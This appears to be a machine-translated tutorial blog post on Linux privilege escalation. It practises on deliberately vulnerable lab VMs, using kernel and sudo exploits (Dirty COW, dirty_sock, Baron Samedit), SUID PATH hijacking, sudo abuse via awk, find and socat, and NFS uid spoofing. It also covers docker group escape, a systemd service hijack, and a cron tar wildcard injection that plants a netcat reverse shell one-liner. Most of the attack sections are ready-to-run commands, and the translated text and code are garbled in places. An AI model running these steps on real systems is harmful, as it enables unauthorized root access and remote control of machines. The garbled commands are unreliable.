Linux commonly used methods of privilege escalation ( ) penetration testing

Linux commonly used methods of privilege escalation ( ) penetration testing

Article Directory


Before proceeding with the Linux privilege escalation, it is best to have an understanding of the commonly used commands for Linux information collection and penetration testing .

Summary of commonly used commands

Here is a brief mention of commonly used commands

uname -a
View all system information
ifconfig -a
View all network information
ps aux
ps -elf
View process information
View user information
crontab -l
View the scheduled tasks of the current user

Drone environment

For the following rights escalation, I will mainly use two drones

  1. OWASP_Broken_Web_Apps_VM_1.2 (default username account:
    ) Download link :
  2. lin.security_v1.0 (default username account:
    ) Download link :

If you feel the download on the official website is slow, you can download it from the Baidu network disk I provided.
Extraction code: panx

Here, the OWASP_Broken_Web_Apps_VM_1.2 environment uses the root user by default, so I added a new user to him to facilitate our privilege escalation test!

# Add a new user named xunmi, and set the default command line to bash (this is easier to use, the default is sh) useradd -s/bin/bash -m xunmi # Set a password for the xunmi user (it is recommended to set a simpler, convenient for our own use) passwd xunmi # Create xunmi home directory mkdir/home/xunmi # Transfer permissions to xunmi chown -R xunmi:xunmi/home/xunmi Copy code

The default keyboard of the security_v1.0 environment and the network environment have some problems, we need to configure them (because configuring these require advanced permissions, we will raise the rights first)

# This is a privilege escalation command, which will be explained in detail later because root privileges will be used, so use it first! sudo awk'BEGIN {system("/bin/bash")}' # Modify keyboard layout # The default/symbol is shift +2 vim/etc/default/keyboard # Change the value of XKBLAYOUT to us # Save and exit (:wq) to restart the service, the following command setupcon # Configure the network card vim/etc/netplan/50-cloud-init.yaml # Change enp0s3 to ens33 # Restart the service after exiting from the same configuration netplan apply # Switch back to our regular users to facilitate the upgrade test later su-bob Copy code

Linux privilege escalation method

Privilege escalation refers to a method of changing from a low-privileged user to a high-privileged user. So we must at least ensure that we have obtained low-privileged users of the target machine.
Linux vulnerability information collection : ( )

Linux privilege escalation vulnerability exploitation

Dirty COW CVE-2016-5195 vulnerability

Main scope of influence: Linux kernel => 2.6.22 ~ 3.9 (x86/x64)
Vulnerability detection:

uname -a
Check whether the linux kernel is within this range.
Download address : Use the
target machine: OWASP_Broken_Web_Apps_VM_1.2
First we download the attack payload to the target machine

#, this is the file of the attack payload. If you transfer the file to the target machine, you are up to you! The shell (FinalShell) terminal I use has Very convenient drag and drop import. # Compile c (under normal circumstances, enter gcc dirty.c -o dirty, but here you need to fill in two dynamic link libraries pthread and lcrypt) gcc -pthread dirty.c -o dirty -lcrypt # Grant permissions to the generated files chmod 777 dirty # Run the file (followed by the password you want to set! This password will replace the password of the target root user.) ./dirty password # Switch users, although the user who switches into is not called root, but has all root permissions (you can enter id to view information) su- # Remember to restore the password file after doing things mv/tmp/passwd.bak/etc/passwd Copy code

CVE-2019-7304 vulnerability

This is a Linux package manager snap local privilege escalation vulnerability, mainly for some Ubantu systems

Ubuntu version range:
Ubuntu 18.10
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
snap version range:
2.28 <snapd <2.37

Vulnerability detection:

snap --version
Check whether the current version is within the specified range of
attack payload :
(v1: send the target secret key to the specified mailbox, v2: create a user with all sudo permissions with a username and password of dirty_sock!)

# Here we use v2 version # First empower chmod 777 # currently using python3 # After the following figure is successful, you can log in to the dirty_sock user (the password is also dirty_sock) su-dirty_sock # After logging in successfully, you can use the sudo command to execute any command as an administrator. For example, the following commands can be directly switched to the root user! sudo su Copy code

CVE-2019-13272 vulnerability

Main scope of influence: Linux kernel => 4.10 ~ 5.1.17 The
attack payload describes that the following versions of the system can be upgraded (I currently do not have the target machine of the following system, so this vulnerability has not been reproduced)

//-Ubuntu 16.04.5 kernel 4.15.0-29-generic
//-Ubuntu 18.04.1 kernel 4.15.0-20-generic
//-Ubuntu 19.04 kernel 5.0.0-15-generic
//-Ubuntu Mate 18.04. 2 kernel 4.18.0-15-generic
//-Linux Mint 19 kernel 4.15.0-20-generic
//-Xubuntu 16.04.4 kernel 4.13.0-36-generic
//-ElementaryOS 0.4.1 4.8.0-52 -generic
//-Backbox 6 kernel 4.18.0-21-generic
//-Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
//-Kali kernel 4.19.0-kali5-amd64
//-Redcore 1806 (LXQT) kernel 4.16.16-redcore
//-MX 18.3 kernel 4.19.37-2~mx17+1
//-RHEL 8.0 kernel 4.18.0-80.el8.x86_64
//-Debian 9.4.0 kernel 4.9.0 -6-amd64
//-Debian 10.0.0 kernel 4.19.0-5-amd64
//-Devuan 2.0.0 kernel 4.9.0-6-amd64
//-SparkyLinux 5.8 kernel 4.19.0-5-amd64
//-Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
//-Manjaro 18.0. 3 kernel 4.19.23-1-MANJARO
//-Mageia 6 kernel 4.9.35-desktop-1.mga6
//-Antergos 18.7 kernel 4.17.6-1-ARCH

Attack load :
Download :

# Download attack payload wget -O exp.c # Compile the target gcc exp.c -o exp # Start right escalation ./exp Copy code

CVE-2021-3156 vulnerability

Main scope of influence: sudo 1.8.2~1.8.31p2, sudo 1.9.0~1.9.5p1
vulnerability detection:

sudoedit -s/
Error message
At the beginning, there may be this risk.
At the beginning, there is no risk. In addition to these two cases, there may also be errors caused by not having sudo permission!

Download address :
conditions for using this vulnerability are quite harsh. First of all, we need the user to have certain sudo permissions.
sudo -l
Secondly, a security mechanism that comes with Linux also has a great impact on the exploitation of this vulnerability. This security mechanism causes the service to be in a different memory area every time it starts, and this vulnerability needs to know the memory offset of our sudo service. The amount can be aligned for vulnerability exploitation. The following exploit script can help us use the brute force method (brute force) to find the location of sudo.
Download address :
script is also relatively simple to use, but it should be noted that this script should be written in the Windows environment. There were some coding problems when I uploaded it to Linux.
/bin/bash^M: bad interpreter: No such file or directory
, If you have similar problems, you need to change the encoding first

# First vim opens the file we need to execute vim # Edit the file, execute : set ff=unix # Exit editing :wq # Run script ./ Copy code

Then this script will start brute force attacks.

Linux environment variables

# See all environment variables Export # View Path environment variable echo $ the PATH copy the code

The commands we use in linux are executable files, and the linux system quickly locates the commands we want to execute through the paths specified by these environment variables. For example, I want to execute an ls command. In fact, we execute the executable file/bin/ls, and the system relies on the ls found in the path/bin we set in the environment variable and executes it.

The priority of this execution is from front to back, as shown in the figure above.

Found in path
, It will use
In the path
Instead of
middle. And we mainly need to use this feature to complete the escalation of rights.

# Temporarily add environment variables (from scratch to add) Export the PATH = path: $ the PATH # added to the end Export the PATH = $ the PATH : path to copy the code

File special permission utilization

I mentioned in the commonly used commands for Linux penetration testing that Linux has several special permissions, which will mainly be run by the owner.

Run with subordinate groups
, If we know that the owner or group of the executable file that has been run by the owner or the group is the administrator, and will call those commands, we can try to align the commands to do replacement processing to achieve the purpose of escalation.

Suppose there is such a file now,

#include<unistd.h> #include<stdlib.h> void main (){ setuid(0); setgid(0); system( "ps" ); } Copy code

We compile it into an executable file and give it execution permission to the owner!

gcc ps.c -o test chmod 4777 test ls -l Copy code

The above condition is just a test condition I built. If you encounter a similar situation under normal circumstances, you can try this execution method

# Find the above-mentioned file method # From the root directory (/), find the owner (4000) or the group (2000) or the file (f) that has both the owner and the group (6000) execution permission, and delete it automatically All errors are reported (2>/dev/null, 2 is all error messages,/dev/null is a virtual file in linux) find/-perm -4000- type f 2>/dev/null # detailed information version find/-4000 -perm - type F - Exec LS -Al {}/; 2>/dev/null duplicated code

From the above owner executable file, we can see that the target will call the ps command. At this time, we can use environment variables to replace the file that the target wants to execute with the command we want to execute

# Create a ps file to be replaced (if the current user does not have his own folder, you can create it in the temporary folder/tmp) echo "/bin/bash" > ps # Give the ps file we created rights chmod 777 ps # Add environment variables (current in my ps/home/bob directory!) Export the PATH =/home/bob: $ the PATH copy the code

suid command summary website (gtfobins) :
In addition to the above-mentioned use, we can also find some system commands to use, for example, we found it when looking for the owner to execute the file.

Command, at this time we can use the vulnerability of this command to

escalate the rights of the taskset command :

View hidden files

# Linux hidden files will start with ., so use ".*" to match hidden files find/-name ".*" - type f 2>/dev/null # View the detailed information version, and only view the/home path Hidden files find/-name ".*" - type f -path "/home/*" - exec ls -al {}/; 2>/dev/null # or find/home -name ".*" - type F - Exec LS -Al {}/; 2>/dev/null duplicated code

sudo permission abuse

The prerequisite for abusing sudo is that you know the clear text password of the currently logged in user!
Many command permissions in Linux can only be used by administrators. If ordinary users want to execute some administrator commands without logging in to the administrator account, they need to use sudo This permission, if you have all sudo permissions, is basically the same as the Linux super administrator root user. use

sudo -l
Commands can view which permissions the current user has. The following two types are prompts with all sudo permissions and without any sudo permissions.

If the user you got found has all the sudo permissions, then congratulations, Baocai, you have found a ghost. enter
sudo su
The root user can be obtained with the command, but under normal conditions, I should not be so lucky.
In most cases, we may encounter the following similar situations, which will tell us which permissions the current user has can use the sudo command to execute. If you pick up a ghost again, find that there is
Orders like this can also be directly raised.

In addition to the situation where ghosts are found above, sudo will generally give users rights with a high probability
The permissions are convenient for users to find, or
Such commands.
Privilege escalation command summary website (gtfobins) : For
example, we use
Right escalation

# # Execute (-exec)/bin/bash in the current directory (.), and exit (-quit) after the execution is complete; on behalf of executing another command ,/it is; the escape character . sudo the Find - Exec/bin/bash/; -QUIT # socat can, and the rest do not demonstrate # stdin is the standard input sudo socat stdin Exec :/bin/SH copy the code

Timed task escalation

Generally, when we get low-privileged users, we will see if the other party has scheduled tasks, as shown below

# View which scheduled tasks are in the current system cat/etc/crontab # View the file type (if the script is the best, shell script) file Scheduled task execution file # View current file permissions ls -l timed task execution file Copy code

First of all, we can see that there is a timed task that is executed every minute in this system, and this timed task is a script, but we only have the readable permission of
this script. This timed task mainly executes all the files in the home directory. Subdirectory compressed backup

In the catalog

Write the parameters in the file name

Before exploiting this vulnerability, we need to know a feature of Linux. If we have a name

The file will conflict with the original parameters! As shown in the figure below, I created a file named
File, but I use
cat --help
But unable to view this file, it will trigger the help command.

Here we use msf to generate a local bounce command

# This command will generate a reverse shell command msfvenom -p cmd/unix/reverse_netcat lhost= lport=8888 R # It is okay not to execute the above command, just use the one I generated mkfifo/tmp/mpuo; nc 8888 0</tmp/mpuo |/bin/sh >/tmp/mpuo 2>&1; rm/tmp/mpuo Copy code

In the above scheduled task, we found that among the files that are regularly backed up, there is our current user's directory

# Timing tasks executed each time for i in $(ls/home); do cd/home/$i &&/bin/tar -zcf/etc/backups/home- $i .tgz *; done # where this paragraph means Assign all the folder names in/home to i. Below we use bob as an example. If i is assigned to bob now for i in $(ls/home) # Then it will be cd to the home directory of bob cd/home/bob # Below is the command we need to use to back up all the files in Bob's home directory! /bin/tar -zcf/etc/backups/home-bob.tgz * Copy code


# Write the local rebound shell command generated above into the script echo "mkfifo/tmp/mpuo; nc 8888 0</tmp/mpuo |/bin/sh >/tmp/mpuo 2>&1; rm/tmp/mpuo " > # Execute a script echo > "--checkpoint=1" # Execute the script target (execute the shell script, the rebound command we generated above) echo > "--checkpoint-action=exec=sh " # After the above command is established, the packaging command will become as shown below when backing up and packaging again # tar -zcf/etc/backups/home-bob.tgz --checkpoint=1 --checkpoint-action=exec=sh shell. sh # listen to our bounce interface nc -lvvp 8888 Copy code

Low-privilege access to network file system

Network File System, English Network File System (NFS) It allows computers in the network to share resources through the TCP/IP network. In NFS applications, local NFS client applications can transparently read and write files located on remote NFS servers, just like accessing local files. Similar to the network function in Windows, this function is open on port 2049 by default. We can use the following nmap command to find the target machine

nmap -sS -T4 -p - destination address copy the code

# Install nfs service apt-get install nfs-common # View read permissions showmount -e target address # Mount local mount target address: the local directory of the directory to be mounted remotely Copy code

After the mounting is complete, we can see the target file, but we do not have the write operation permission to this directory, because my super administrative user is compressed into an anonymous user.

Write without authority

If we write the file on the other host first, we can achieve this by forging the user of the other host. First of all, according to the information we obtained when mapping the file above, the target mapping file belongs to

User, and the uid of this user is 1001, and the gid is 1005. We also create a similar user locally

# Create a group named peter, group number 1005 (general user group and user are the same name) groupadd -g 1005 peter # Create the peter user and add it to the peter group adduser peter -uid 1001 -gid 1005 # View peter information cat/etc/passwd |grep peter Copy code

Then you can write the file in the target machine

Docker escalation

Prerequisites: 1. The target machine belongs to the docker group 2. The target machine is best connected to the external network (or you can also try to upload files to the target machine, but this requires a certain docker usage basis)
After the above conditions are met, only Need to enter

docker run -v/:/hostOS -i -t chrisfosterelli/rootplease
You can try to escalate rights

Systemd configuration privilege escalation

Introduction to Systemd

In many previous versions of Linux, the services are

Process-related, we need to enter the following commands when starting

# Assuming that the apache2 service is started here sudo/etc/init.d/apache2 start # Or service apache2 start Copy code

Because the process is designed to use serial startup and is only responsible for starting service scripts, it is relatively inefficient. and
It exists to solve these problems.
Many new systems will set Systemd as the first process of the system (PID=1), and
Not a command, but a set of commands to manage the system, where
Main command

# Restart the system $ sudo systemctl reboot # Turn off the system, cut off the power $ sudo systemctl poweroff # View startup time $ systemd-analyze Copy code

Systemd escalation

The systemd privilege escalation is actually similar to the special file privilege escalation I mentioned above. First of all, we still need to find a target that can be executed by the super administrator province. I use it here.

Because we are currently
The user is aligned with writable permissions.

Looking at this service configuration, you can see that the current service will have executed a file in the super administrator (root) user province, then we only need to change the target file to the command we want the target to execute, and restart the service!

# First go back to the user's home directory cd ~ # Escape characters such as/n (-e), copy/bin/bash to/home/peter/administrator console, and assign it to 6755 # Save it in `Administrator` file, and assign execution permission echo -e '#!/bin/bash/ncp/bin/bash/home/peter/Administrator console\nchmod 6755/home/peter/management Administrator console' >/home/peter/Administrator && chmod +x Administrator # Modify debug configuration file vim/lib/systemd/system/debug.service # ExecStart=Assign value /home/peter/Admin Copy code

But after restarting the service, you need other means. If it doesn t work, just wait for the administrator to restart the system that day! After restarting, we can see the following

Admin console
, This time is not directly executed
Admin console
You can get root user permissions, but we need to execute
./Administrator console -p
To get root privileges!